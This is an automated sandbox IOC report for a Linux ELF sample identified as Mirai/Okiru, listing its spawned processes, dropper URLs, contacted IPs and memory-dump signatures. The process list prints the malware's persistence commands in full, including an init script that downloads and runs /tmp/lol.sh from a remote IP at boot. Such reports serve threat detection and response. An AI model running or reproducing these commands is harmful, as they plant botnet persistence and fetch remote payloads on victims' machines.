Automated Malware Analysis IOC Report for

Files

File Path

Type

Processes

Path

Cmdline

Malicious

/tmp/x86_32.nn.elf

/bin/sh

sh -c "systemctl enable custom.service >/dev/null 2>&1"

/bin/sh

/usr/bin/systemctl

systemctl enable custom.service

/tmp/x86_32.nn.elf

/bin/sh

sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"

/bin/sh

/usr/bin/chmod

chmod +x /etc/init.d/system

/tmp/x86_32.nn.elf

/bin/sh

sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"

/bin/sh

/usr/bin/ln

ln -s /etc/init.d/system /etc/rcS.d/S99system

/tmp/x86_32.nn.elf

/bin/sh

sh -c "echo \"#!/bin/sh\n# /etc/init.d/sh\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sh'\n /bin/sh &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping sh'\n killall sh\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sh"

/tmp/x86_32.nn.elf

/bin/sh

sh -c "chmod +x /etc/init.d/sh >/dev/null 2>&1"

/bin/sh

/usr/bin/chmod

chmod +x /etc/init.d/sh

/tmp/x86_32.nn.elf

/bin/sh

sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"

/bin/sh

/usr/bin/mkdir

mkdir -p /etc/rc.d

/tmp/x86_32.nn.elf

/bin/sh

sh -c "ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1"

/bin/sh

/usr/bin/ln

ln -s /etc/init.d/sh /etc/rc.d/S99sh

/tmp/x86_32.nn.elf

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/lib/systemd/systemd

/usr/lib/systemd/system-environment-generators/snapd-env-generator

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/libexec/gnome-session-binary

/bin/sh

/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping

/usr/libexec/gsd-housekeeping

There are 36 hidden processes, click here to show them.

URLs

Name

Malicious

http://94.156.227.233/curl.sh

unknown

Details

Name:	http://94.156.227.233/curl.sh
TargetID:	12
From Memory:	true
Current Path:	/tmp/x86_32.nn.elf
Source:	x86_32.nn.elf
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
Found strings indicative of a multi-platform dropper	Spreading	Scripting
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable	System Summary
URLs found in memory or binary data	Networking

http://94.156.227.233/lol.sh

unknown

Details

Name:	http://94.156.227.233/lol.sh
TargetID:	12
From Memory:	true
Current Path:	/tmp/x86_32.nn.elf
Source:	x86_32.nn.elf
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
Found strings indicative of a multi-platform dropper	Spreading	Scripting
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable	System Summary
URLs found in memory or binary data	Networking

http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s

unknown

Details

Name:	http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s
TargetID:	12
From Memory:	true
Current Path:	/tmp/x86_32.nn.elf
Source:	x86_32.nn.elf
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
URLs found in memory or binary data	Networking

http://94.156.227.233/

unknown

Details

Name:	http://94.156.227.233/
TargetID:	-1
From Memory:	true
Source:	x86_32.nn.elf, sh.32.dr, profile.12.dr, system.12.dr, inittab.12.dr, bootcmd.12.dr, custom.service.12.dr
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
Executes commands using a shell command-line interpreter	Persistence and Installation Behavior	Scripting
Found strings indicative of a multi-platform dropper	Spreading	Scripting
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable	System Summary
URLs found in memory or binary data	Networking

IPs

Domain

Country

Malicious

175.112.97.98

unknown

Korea Republic of

210.24.160.39

unknown

Singapore

125.136.3.9

unknown

Korea Republic of

204.67.8.133

unknown

United States

142.175.176.100

unknown

Canada

201.168.119.77

unknown

Mexico

40.204.238.157

unknown

United States

28.73.234.59

unknown

United States

27.33.4.123

unknown

Australia

3.54.36.218

unknown

United States

164.77.169.44

unknown

Chile

44.191.44.29

unknown

United States

185.110.64.4

unknown

Spain

140.149.19.111

unknown

Thailand

189.62.107.204

unknown

Brazil

199.243.48.156

unknown

Canada

61.220.163.190

unknown

Taiwan; Republic of China (ROC)

110.219.123.3

unknown

China

9.141.242.55

unknown

United States

179.229.155.19

unknown

Brazil

7.250.19.193

unknown

United States

80.164.153.130

unknown

Denmark

104.250.157.28

unknown

United States

60.195.238.149

unknown

China

171.25.61.99

unknown

Switzerland

213.200.225.246

unknown

Switzerland

132.45.10.194

unknown

United States

183.216.254.225

unknown

China

34.158.104.232

unknown

United States

163.35.130.77

unknown

United States

80.145.229.176

unknown

Germany

131.115.84.44

unknown

Sweden

45.101.218.242

unknown

Egypt

165.51.231.8

unknown

Tunisia

94.89.34.146

unknown

Italy

106.8.147.38

unknown

China

30.209.121.207

unknown

United States

60.211.13.205

unknown

China

103.249.176.87

unknown

China

3.35.124.145

unknown

United States

114.164.8.38

unknown

Japan

126.155.70.145

unknown

Japan

139.123.220.33

unknown

Finland

55.97.9.224

unknown

United States

213.239.11.145

unknown

Ireland

121.103.116.149

unknown

Japan

35.234.64.95

unknown

United States

6.96.231.69

unknown

United States

13.100.26.76

unknown

United States

192.215.13.135

unknown

United States

149.202.242.118

unknown

France

29.95.35.30

unknown

United States

81.241.210.75

unknown

Belgium

2.94.36.50

unknown

Russian Federation

132.0.234.26

unknown

United States

217.55.129.83

unknown

Egypt

207.121.155.43

unknown

United States

105.243.41.14

unknown

South Africa

113.81.81.103

unknown

China

213.79.169.61

unknown

Sweden

177.38.141.68

unknown

Brazil

68.96.251.123

unknown

United States

26.237.129.81

unknown

United States

40.191.217.103

unknown

United States

211.66.84.66

unknown

China

199.150.227.26

unknown

United States

171.221.193.30

unknown

China

205.49.27.99

unknown

United States

55.201.78.208

unknown

United States

11.138.136.196

unknown

United States

22.18.90.117

unknown

United States

132.11.15.136

unknown

United States

185.165.16.185

unknown

Germany

171.192.132.121

unknown

United States

14.227.170.200

unknown

Viet Nam

24.71.68.3

unknown

Canada

92.151.49.151

unknown

France

30.6.24.174

unknown

United States

50.26.56.156

unknown

United States

29.79.39.167

unknown

United States

134.83.33.151

unknown

United Kingdom

135.226.21.134

unknown

United States

143.101.54.219

unknown

United States

134.165.169.6

unknown

United States

11.166.127.138

unknown

United States

49.65.107.113

unknown

China

66.1.97.85

unknown

United States

189.235.201.58

unknown

Mexico

92.169.46.255

unknown

France

20.246.197.1

unknown

United States

134.66.130.239

unknown

United States

179.217.109.222

unknown

Brazil

185.16.172.234

unknown

Switzerland

138.212.128.2

unknown

Japan

160.97.164.104

unknown

Italy

219.217.26.97

unknown

China

40.229.58.107

unknown

United States

112.28.143.124

unknown

China

14.149.215.121

unknown

China

123.28.98.207

unknown

Viet Nam

There are 90 hidden IPs, click here to show them.

Memdumps

Base Address

Regiontype

Protect

Malicious

805f000

page execute read

Details

Name:	6215.1.0000000008048000.000000000805f000.r-x.sdmp
TargetID:	12
Dumpstage:	process exit
Protect:	page execute read
Base address:	805f000
Size:	94208

Signature Hits	Behavior Group	Mitre Attack
Malicious sample detected (through community Yara rule)	System Summary
Yara detected Mirai	Stealing of Sensitive Information, Remote Access Functionality
Yara detected Okiru	Stealing of Sensitive Information, Remote Access Functionality
Yara signature match	System Summary

8060000

page read and write

8062000

page read and write

f7f02000

page execute read

ff93f000

page read and write

9972000

page read and write

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report
x86_32.nn.elf

Files

Processes

URLs

IPs

Memdumps

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Reportx86_32.nn.elf

Files

Processes

URLs

IPs

Memdumps

IOC Report
x86_32.nn.elf